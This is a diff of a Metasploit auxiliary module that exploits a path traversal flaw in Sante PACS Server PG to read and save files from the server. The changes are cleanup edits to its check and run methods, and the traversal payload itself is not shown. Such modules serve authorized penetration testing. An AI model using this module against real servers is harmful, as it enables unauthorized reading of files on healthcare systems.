cleanup

cleanup

Author: h4x-x0r

modules/auxiliary/gather/pacsserver_traversal.rb

@@ -1,3 +1,8 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::HttpClient
   include Msf::Auxiliary::Report
@@ -47,18 +52,18 @@ def check
     begin
       res = send_request_cgi({
         'method' => 'GET',
-        'uri' => normalize_uri(target_uri.path, 'index.html ')
+        'uri' => normalize_uri(target_uri.path, 'index.html')
       })
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
-      return CheckCode::Unknown
+      return CheckCode::Unknown('Connection failed')
     end
 
     if res && res.code == 200
       data = res.to_s
       if data.include?('Sante PACS Server PG')
-        vprint_status('Sante PACS Server PG seems to be running on the server.')
-        return CheckCode::Detected
+        return CheckCode::Detected('Sante PACS Server PG seems to be running on the server.')
       end
+
       return CheckCode::Safe
     end
     return CheckCode::Unknown
@@ -75,9 +80,9 @@ def run
 
     fail_with(Failure::Unknown, 'No response from server.') if res.nil?
     fail_with(Failure::UnexpectedReply, 'Non-200 returned from server. If you believe the path is correct, try increasing the path traversal depth.') if res.code != 200
-    print_good("File retrieved: /assets/#{traversal}")
+    print_good("File retrieved: #{target_uri.path}assets/#{traversal}")
 
-    store_loot('pacsserver.file', 'text/plain', datastore['RHOSTS'], res.body, datastore['FILE'], 'File retrieved through PACS Server path traversal.')
-    print_status('File saved as loot.')
+    path = store_loot('pacsserver.file', 'text/plain', datastore['RHOSTS'], res.body, datastore['FILE'], 'File retrieved through PACS Server path traversal.')
+    print_status("File saved as loot: #{path}")
   end
 end